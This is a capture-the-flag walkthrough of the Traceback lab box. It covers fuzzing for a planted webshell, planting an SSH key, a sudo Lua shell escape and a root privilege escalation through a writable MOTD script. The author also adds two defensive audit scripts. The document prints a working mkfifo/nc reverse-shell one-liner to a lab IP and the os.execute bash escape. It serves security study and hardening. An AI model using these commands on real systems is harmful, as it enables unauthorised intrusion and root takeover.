Overview
The target is a Linux box hosting a website that has already been hacked. The attacker left some clues and tools behind on the server, and we need to use them to get root and the flag. First, a bit of OSINT identifies the attacker and, from his GitHub, gives us a list of webshells; wfuzz then finds the webshell he uploaded to the site. The webshell yields the webadmin account, clues on the host lead to a way of running lua scripts as a second, higher-privileged account, sysadmin, and monitoring with pspy reveals a privileged scheduled task that runs local scripts; editing one of those scripts to spawn a reverse shell gets root.
Information gathering
root@vultr:~/htb# nmap -sV -sC 10.10.10.181
Starting Nmap 7.70 ( https://nmap.org ) at 2020-05-28 08:06 UTC
Nmap scan report for 10.10.10.181
Host is up (0.076s latency).
Not shown: 984 closed ports
PORT STATE SERVICE VERSION
22/tcp open ssh OpenSSH 7.6p1 Ubuntu 4ubuntu0.3 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey:
| 2048 96:25:51:8e:6c:83:07:48:ce:11:4b:1f:e5:6d:8a:28 (RSA)
| 256 54:bd:46:71:14:bd:b2:42:a1:b6:b0:2d:94:14:3b:0d (ECDSA)
|_ 256 4d:c3:f8:52:b8:85:ec:9c:3e:4d:57:2c:4a:82:fd:86 (ED25519)
80/tcp open http Apache httpd 2.4.29 ((Ubuntu))
|_http-server-header: Apache/2.4.29 (Ubuntu)
|_http-title: Help us
416/tcp filtered silverplatter
1011/tcp filtered unknown
1130/tcp filtered casp
1521/tcp filtered oracle
2119/tcp filtered gsigatekeeper
3476/tcp filtered nppmp
4900/tcp filtered hfcs
5440/tcp filtered unknown
5903/tcp filtered vnc-3
6580/tcp filtered parsec-master
7741/tcp filtered scriptview
8292/tcp filtered blp3
32773/tcp filtered sometimes-rpc9
52869/tcp filtered unknown
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel
Service detection performed. Please report any incorrect results at https://nmap.org/submit/ .
Nmap done: 1 IP address (1 host up) scanned in 11.32 seconds
Visiting the site in a browser shows it has been defaced; from the text left on the page, Xh4H is probably the attacker's handle (the site is on port 80; I set up a local mapping).
Googling that name turns up his GitHub account, which contains a project called Web-Shells. Since the defaced page hints that the attacker left backdoors behind, I simply used the webshell filenames from that project as a wordlist and brute-forced the directory:
root@vultr:~/htb# cat fuzz.txt
alfa3.php
alfav3.0.1.php
andela.php
bloodsecv4.php
by.php
c99ud.php
cmd.php
configkillerionkros.php
jspshell.jsp
mini.php
obfuscated-punknopass.php
punk-nopass.php
punkholic.php
r57.php
smevk.php
wso2.8.5.php
Fuzzing
Brute-forcing the directory with wfuzz does indeed turn up the webshell he used, smevk.php:
root@vultr:~/htb# wfuzz -w ./fuzz.txt -u http://10.10.10.181/FUZZ --hc 404,403
Warning: Pycurl is not compiled against Openssl. Wfuzz might not work correctly when fuzzing SSL sites. Check Wfuzz's documentation for more information.
********************************************************
* Wfuzz 2.3.4 - The Web Fuzzer *
********************************************************
Target: http://10.10.10.181/FUZZ
Total requests: 17
==================================================================
ID Response Lines Word Chars Payload
==================================================================
000017: C=200 44 L 151 W 1113 Ch ""
000015: C=200 58 L 100 W 1261 Ch "smevk.php"
Total time: 0.241917
Processed Requests: 17
Filtered Requests: 15
Requests/sec.: 70.27192
Opening it in the browser shows a very full-featured webshell, and the current user turns out to be webadmin. For a stable connection, I drop a public key under /home/webadmin/.ssh and log in from my own machine with the private key.
First, generate the key pair locally:
root@vultr:~# ssh-keygen -t rsa
Generating public/private rsa key pair.
Enter file in which to save the key (/root/.ssh/id_rsa):
Enter passphrase (empty for no passphrase):
Enter same passphrase again:
Your identification has been saved in /root/.ssh/id_rsa.
Your public key has been saved in /root/.ssh/id_rsa.pub.
The key fingerprint is:
SHA256:2YE9x2+Eyr/bU1JkYYAbvgxxVvScvIBB1kV0qBUnWR0 root@vultr.guest
The key's randomart image is:
+---[RSA 2048]----+
| .+=+BEB|
| +.*ooOo*|
| . O.*+.B |
| = B.o. o|
| S * . oo |
| + .. .|
| . o |
| o. |
| o... |
+----[SHA256]-----+
root@vultr:~# ls -l /root/.ssh/
total 12
-rw------- 1 root root 1823 May 28 08:39 id_rsa
-rw-r--r-- 1 root root 398 May 28 08:39 id_rsa.pub
-rw-r--r-- 1 root root 666 May 28 03:03 known_hosts
Copy the contents of the public key file, save it as authorized_keys, and upload it straight to /home/webadmin/.ssh through the webshell; after that, ssh with the private key logs in directly.
The home directory holds a few clues: note.txt mentions lua, and .bash_history records some commands that look like /home/sysadmin/luvit being used to run a privesc.lua script. After a good deal of searching, though, neither file can be found, and the webadmin account has no permission to read anything under sysadmin.
#################################
-------- OWNED BY XH4H ---------
- I guess stuff could have been configured better ^^ -
#################################
Welcome to Xh4H land
Failed to connect to https://changelogs.ubuntu.com/meta-release-lts. Check your Internet connection or proxy settings
Last login: Thu May 28 01:48:57 2020 from 10.10.14.101
webadmin@traceback:~$ whoami
webadmin
webadmin@traceback:~$
webadmin@traceback:~$ cat note.txt
- sysadmin -
I have left a tool to practice Lua.
I'm sure you know where to find it.
Contact me if you have any question.
webadmin@traceback:~$ cat .bash_history
ls -la
sudo -l
nano privesc.lua
sudo -u sysadmin /home/sysadmin/luvit privesc.lua
rm privesc.lua
logout
Privilege escalation
sudo -l shows that the binary we were looking for can be run as sysadmin without a password. Conveniently, at that very moment some other player had left a lua file in the home directory that spawns bash; its entire content is one line, os.execute("/bin/bash").
Following the earlier hint, running sudo -u sysadmin /home/sysadmin/luvit script.lua drops straight into a bash as sysadmin, and moving to sysadmin's home directory gives user.txt:
webadmin@traceback:~$ sudo -l
Matching Defaults entries for webadmin on traceback:
env_reset, mail_badpass, secure_path=/usr/local/sbin\:/usr/local/bin\:/usr/sbin\:/usr/bin\:/sbin\:/bin\:/snap/bin
User webadmin may run the following commands on traceback:
(sysadmin) NOPASSWD: /home/sysadmin/luvit
webadmin@traceback:~$ sudo -u sysadmin /home/sysadmin/luvit script.lua
sysadmin@traceback:~$ whoami
sysadmin
sysadmin@traceback:~$ cd ../sysadmin
sysadmin@traceback:/home/sysadmin$ ls -la
total 4336
drwxr-x--- 5 sysadmin sysadmin 4096 Mar 16 03:53 .
drwxr-xr-x 4 root root 4096 Aug 25 2019 ..
-rw------- 1 sysadmin sysadmin 1 Aug 25 2019 .bash_history
-rw-r--r-- 1 sysadmin sysadmin 220 Apr 4 2018 .bash_logout
-rw-r--r-- 1 sysadmin sysadmin 3771 Apr 4 2018 .bashrc
drwx------ 2 sysadmin sysadmin 4096 Aug 25 2019 .cache
drwxrwxr-x 3 sysadmin sysadmin 4096 Aug 24 2019 .local
-rwxrwxr-x 1 sysadmin sysadmin 4397566 Aug 24 2019 luvit
-rw-r--r-- 1 sysadmin sysadmin 807 Apr 4 2018 .profile
drwxr-xr-x 2 root root 4096 Aug 25 2019 .ssh
-rw------- 1 sysadmin sysadmin 33 May 28 01:33 user.txt
sysadmin@traceback:/home/sysadmin$
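The sudo rule that made this step possible, seen from the hardening side: an added example, not code from the write-up, that flags NOPASSWD entries whose target is an interpreter or lives somewhere a non-root user can write. check_sudo_rules and SAMPLE_SUDO_L are my names, and the sample is constructed from the sudo -l output above.

```shell
#!/bin/sh
# Added example (not from the original write-up). A NOPASSWD rule is risky
# when the command is an interpreter or sits in a user-writable directory;
# /home/sysadmin/luvit is both, so running it as sysadmin with a caller-
# supplied .lua file hands over that account. check_sudo_rules reads
# "sudo -l" style text on stdin and prints one RISK line per bad rule.

# constructed sample, modelled on the sudo -l output shown above
SAMPLE_SUDO_L='Matching Defaults entries for webadmin on traceback:
    env_reset, mail_badpass, secure_path=/usr/local/sbin:/usr/local/bin:/usr/bin
User webadmin may run the following commands on traceback:
    (sysadmin) NOPASSWD: /home/sysadmin/luvit
    (root) NOPASSWD: /usr/bin/systemctl restart apache2'

check_sudo_rules() {
    # rule lines look like: "(sysadmin) NOPASSWD: /home/sysadmin/luvit"
    grep -E '^[[:space:]]*\([^)]*\)[[:space:]]+NOPASSWD:' |
    while IFS= read -r line; do
        runas=$(printf '%s\n' "$line" | sed -E 's/^[[:space:]]*\(([^)]*)\).*/\1/')
        cmds=$(printf '%s\n' "$line" | sed -E 's/^.*NOPASSWD:[[:space:]]*//')
        # one rule may list several commands separated by commas
        printf '%s\n' "$cmds" | tr ',' '\n' | while IFS= read -r cmd; do
            # keep only the program path, drop leading blanks and arguments
            cmd=$(printf '%s' "$cmd" | sed -E 's/^[[:space:]]+//; s/[[:space:]].*$//')
            base=${cmd##*/}
            reason=""
            case $cmd in
                ALL) reason="unrestricted (ALL)";;
                /home/*|/tmp/*|/var/tmp/*|/dev/shm/*) reason="binary in user-writable area";;
            esac
            case $base in
                lua*|luvit|python*|perl|ruby|node|sh|bash|dash)
                    reason="${reason:+$reason; }interpreter runs arbitrary code";;
            esac
            if [ -n "$reason" ]; then
                echo "RISK: ($runas) $cmd: $reason"
            fi
        done
    done
}
```

Run it against a live host with `sudo -l | check_sudo_rules` or, for a full policy review, against the output of `sudo -l -U <user>` for each account.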
Next, we go for root. Here pspy is used to watch processes; it lets an unprivileged user see the commands other users run.
After watching for a while, it turns out the target runs a cp command every 30 seconds that copies files from a backup directory into /etc/update-motd.d/:
/bin/sh -c /bin/cp /var/backups/.update-motd.d/* /etc/update-motd.d/
Moving into that directory, 00-header turns out to contain exactly the banner printed at SSH login, and pspy's output shows it is executed automatically whenever someone logs in over ssh:
sh -c uname -a; w; id; /bin/sh -i
which matches this script exactly. Appending an id line lets us verify:
sysadmin@traceback:~$ cd /etc/update-motd.d/
sysadmin@traceback:/etc/update-motd.d$ cat 00-header
#!/bin/sh
#
# 00-header - create the header of the MOTD
# Copyright (C) 2009-2010 Canonical Ltd.
#
# Authors: Dustin Kirkland <kirkland@canonical.com>
#
# This program is free software; you can redistribute it and/or modify
# it under the terms of the GNU General Public License as published by
# the Free Software Foundation; either version 2 of the License, or
# (at your option) any later version.
#
# This program is distributed in the hope that it will be useful,
# but WITHOUT ANY WARRANTY; without even the implied warranty of
# MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE. See the
# GNU General Public License for more details.
#
# You should have received a copy of the GNU General Public License along
# with this program; if not, write to the Free Software Foundation, Inc.,
# 51 Franklin Street, Fifth Floor, Boston, MA 02110-1301 USA.
[ -r /etc/lsb-release ] && . /etc/lsb-release
echo "\nWelcome to Xh4H land \n"
id
Finally, having confirmed that an SSH login makes root execute this script, we add an nc reverse shell: append rm /tmp/f;mkfifo /tmp/f;cat /tmp/f|/bin/sh -i 2>&1|nc 10.10.14.94 8888 >/tmp/f to 00-header, start a listener locally with nc -lvp 8888, and a root reverse shell comes back.
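The root cause of this last step, from the defender's side, as an added example that is not part of the original write-up: scripts under /etc/update-motd.d run as root at every SSH login, so a script there that a non-root user can edit is a root privilege escalation, and the periodic restore from /var/backups/.update-motd.d only helps if that backup is itself root-only. It assumes GNU stat (Ubuntu); audit_motd_dir and its parameters are my names.

```shell
#!/bin/sh
# Added example (not from the original write-up): audit a MOTD script
# directory. pam_motd runs every script under /etc/update-motd.d as root at
# SSH login, so any script a non-root user can modify is a root privesc, and
# the 30-second cp from /var/backups/.update-motd.d only helps if that
# backup is itself root-only. Assumes GNU stat (Ubuntu).
#   usage: audit_motd_dir /etc/update-motd.d
#          audit_motd_dir /var/backups/.update-motd.d

audit_motd_dir() {
    dir=$1
    want=${2:-root}          # the owner every script should have
    bad=0
    for f in "$dir"/*; do
        [ -f "$f" ] || continue
        # %U owner, %G group, %A symbolic mode such as "-rwxrwxr-x"
        set -- $(stat -c '%U %G %A' "$f")
        owner=$1 group=$2 mode=$3
        reason=""
        if [ "$owner" != "$want" ]; then
            reason="owned by $owner, not $want"
        fi
        # 6th character of the mode string is the group write bit, 9th is world
        case $mode in ?????w*) reason="${reason:+$reason; }group-writable ($group)";; esac
        case $mode in ????????w*) reason="${reason:+$reason; }world-writable";; esac
        # a fifo piped into nc never belongs in a MOTD script: a cheap
        # tamper indicator for exactly the modification shown above
        if grep -Eq 'mkfifo|(^|[^[:alnum:]_])nc[[:space:]]' "$f"; then
            reason="${reason:+$reason; }contains mkfifo/nc"
        fi
        if [ -n "$reason" ]; then
            echo "RISK $f [$mode $owner:$group]: $reason"
            bad=$((bad + 1))
        fi
    done
    return $bad              # exit status = number of risky scripts, 0 = clean
}
```

Run it on both directories the cp job touches; a clean result is exit status 0, and anything else lists the script and why it was flagged.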